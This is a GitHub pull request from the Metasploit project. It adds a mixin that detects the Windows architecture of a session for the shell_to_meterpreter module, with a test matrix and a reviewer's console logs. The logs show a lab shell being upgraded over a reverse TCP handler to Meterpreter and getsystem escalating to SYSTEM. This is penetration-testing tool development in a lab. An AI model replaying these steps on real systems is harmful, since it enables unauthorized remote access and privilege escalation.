
Created mixin to retrieve the architecture of the current shell. #18062

Merged
merged 3 commits into from Jun 5, 2023

Conversation

smashery

@smashery smashery commented Jun 5, 2023

Adds a mixin to support retrieving the architecture of the current shell. In Meterpreter, this uses the built-in behaviour, which calls the appropriate API. In command shells and PowerShell, it looks at the appropriate environment variables.

I added this to the shell_to_meterpreter module for now.

Currently only supports Windows, tested on Win2000 upwards.

Verification

To test this, I created a test module that simply includes the mixin, calls get_os_architecture, and prints it out.

Tested on:

Command Shell

  • Windows 2000 x86
  • Windows XP x86
  • Windows 2003 x86
  • Windows XP x64
  • Windows XP x64 (x86 process)
  • Windows Server 2008 x64
  • Windows Server 2008 x64 (x86 process)
  • Windows Server 2008 R2 x64
  • Windows Server 2008 R2 x64 (x86 process)
  • Windows Server 2012 x64
  • Windows Server 2012 x64 (x86 process)
  • Windows 10 x64
  • Windows 10 x64 (x86 process)
  • Windows Server 2022 x64
  • Windows Server 2022 x64 (x86 process)

Meterpreter

  • Windows XP x86
  • Windows 2003 x86
  • Windows XP x64
  • Windows XP x64 (x86 process)
  • Windows Server 2008 x64
  • Windows Server 2008 x64 (x86 process)
  • Windows Server 2008 R2 x64
  • Windows Server 2008 R2 x64 (x86 process)
  • Windows Server 2012 x64
  • Windows Server 2012 x64 (x86 process)
  • Windows 10 x64
  • Windows 10 x64 (x86 process)
  • Windows Server 2022 x64
  • Windows Server 2022 x64 (x86 process)

PowerShell

  • Windows Server 2008 R2 x64
  • Windows Server 2008 R2 x64 (x86 process)
  • Windows Server 2012 x64
  • Windows Server 2012 x64 (x86 process)
  • Windows 10 x64
  • Windows 10 x64 (x86 process)
  • Windows Server 2022 x64
  • Windows Server 2022 x64 (x86 process)

Python

  • Python-32-bit on Win10 x64
  • Python-64-bit on Win10 x64

Java

  • JRE64 on Win10

Currently only supports Windows, but does work on Win2000 upwards.
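As an added illustration of the command-shell case the description mentions (not the PR's mixin or any Metasploit code), the Ruby below derives the host architecture from the variables a Windows shell reports. It assumes those "appropriate environment variables" are the standard PROCESSOR_ARCHITECTURE and PROCESSOR_ARCHITEW6432; the helper names and sample `set` output are constructed for this example.

```ruby
# Added example, not the PR's mixin: derive the host architecture of a
# Windows command shell from its environment variables. Assumption: the
# "appropriate environment variables" the PR mentions are the standard
# PROCESSOR_ARCHITECTURE (architecture of the shell process) and
# PROCESSOR_ARCHITEW6432 (set only when a 32-bit process runs on a 64-bit
# host, i.e. under WOW64, and then naming the host architecture).

# Values Windows reports, mapped to the short names used in session
# listings (e.g. "shell x86/windows"). Unknown values map to nil.
WINDOWS_ARCH_MAP = { 'AMD64' => 'x64', 'X86' => 'x86' }.freeze

# Parse `set`-style output (one NAME=value per line) into a hash with
# upper-cased names; Windows variable names are case-insensitive.
def parse_env_output(output)
  output.each_line.each_with_object({}) do |line, env|
    name, value = line.chomp.split('=', 2)
    next if name.nil? || name.strip.empty? || value.nil?
    env[name.strip.upcase] = value.strip
  end
end

# Architecture of the shell process itself.
def process_arch(env)
  WINDOWS_ARCH_MAP[env['PROCESSOR_ARCHITECTURE'].to_s.upcase]
end

# Architecture of the host OS. Under WOW64, PROCESSOR_ARCHITECTURE says
# "x86" for the process while PROCESSOR_ARCHITEW6432 says "AMD64" for
# the host, so the latter takes precedence whenever it is present.
def host_arch(env)
  raw = env['PROCESSOR_ARCHITEW6432'] || env['PROCESSOR_ARCHITECTURE']
  WINDOWS_ARCH_MAP[raw.to_s.upcase]
end

# Summarise a shell as host arch, process arch and WOW64 flag; nil when
# neither variable is present (not a Windows shell, or `set` failed).
def describe_shell(env)
  host = host_arch(env)
  return nil if host.nil?
  proc_arch = process_arch(env)
  { host: host, process: proc_arch, wow64: proc_arch != host }
end

# Constructed `set` output for three cases from the PR's test matrix.
SAMPLE_NATIVE_X64 = "PROCESSOR_ARCHITECTURE=AMD64\nSystemRoot=C:\\Windows\n"
SAMPLE_WOW64_X86  = "PROCESSOR_ARCHITECTURE=x86\nPROCESSOR_ARCHITEW6432=AMD64\n"
SAMPLE_NATIVE_X86 = "PROCESSOR_ARCHITECTURE=x86\nSystemRoot=C:\\WINNT\n"

[SAMPLE_NATIVE_X64, SAMPLE_WOW64_X86, SAMPLE_NATIVE_X86].each do |s|
  p describe_shell(parse_env_output(s))
end
```

The WOW64 case is the one the "(x86 process)" entries in the test matrix exercise: the session listings further down show an x86/windows shell on Server 2022 being upgraded to an x64/windows Meterpreter session.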

@gwillcox-r7 gwillcox-r7 left a comment

One minor concern, but otherwise this code looks good, nice work!

lib/msf/core/post/architecture.rb (review comment, outdated, resolved)
@gwillcox-r7 gwillcox-r7 self-assigned this Jun 5, 2023
@gwillcox-r7

Windows Server 2022 WOW64 session working fine:

msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type               Information                                                      Connection
  --  ----  ----               -----------                                                      ----------
  2         shell x86/windows  Shell Banner: Microsoft Windows [Version 10.0.20348.1726] -----  192.168.64.128:35533 -> 192.168.64.138:4444 (192.168.64.138)

msf6 post(multi/manage/shell_to_meterpreter) > exploit

[*] Upgrading session ID: 2
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.64.128:4433 
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 
[*] Sending stage (200774 bytes) to 192.168.64.138
[*] Meterpreter session 3 opened (192.168.64.128:4433 -> 192.168.64.138:50066) at 2023-06-05 11:25:46 -0500
[*] Stopping exploit/multi/handler

msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                      Connection
  --  ----  ----                     -----------                                                      ----------
  2         shell x86/windows        Shell Banner: Microsoft Windows [Version 10.0.20348.1726] -----  192.168.64.128:35533 -> 192.168.64.138:4444 (192.168.64.138)
  3         meterpreter x64/windows  DAFOREST\Administrator @ WIN-E72FSF87GO1                         192.168.64.128:4433 -> 192.168.64.138:50066 (192.168.64.138)

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: DAFOREST\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

@gwillcox-r7

And with a native x64 shell on x64 it also seems to be correctly identifying the host as an x64 host:

msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 6
SESSION => 6
msf6 post(multi/manage/shell_to_meterpreter) > explit
[-] Unknown command: explit
msf6 post(multi/manage/shell_to_meterpreter) > exploit

[*] Upgrading session ID: 6
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.64.128:4433 
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 
[*] Sending stage (200774 bytes) to 192.168.64.138
[*] Meterpreter session 7 opened (192.168.64.128:4433 -> 192.168.64.138:50092) at 2023-06-05 11:32:52 -0500
[*] Stopping exploit/multi/handler

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 7
[*] Starting interaction with 7...

meterpreter > getuid
Server username: DAFOREST\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > background
[*] Backgrounding session 7...
smsf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                      Connection
  --  ----  ----                     -----------                                                      ----------
  6         shell x64/windows        Shell Banner: Microsoft Windows [Version 10.0.20348.1726] -----  192.168.64.128:40933 -> 192.168.64.138:4444 (192.168.64.138)
  7         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WIN-E72FSF87GO1                            192.168.64.128:4433 -> 192.168.64.138:50092 (192.168.64.138)

msf6 post(multi/manage/shell_to_meterpreter) > 

@gwillcox-r7

Content looks good, will land this once tests pass.

@gwillcox-r7 gwillcox-r7 merged commit d029b26 into rapid7:master Jun 5, 2023
30 checks passed
@gwillcox-r7

Release Notes

A new mixin has been added to support detecting the architecture of the host OS on Windows systems. Support for other OSes will be added at a later date.
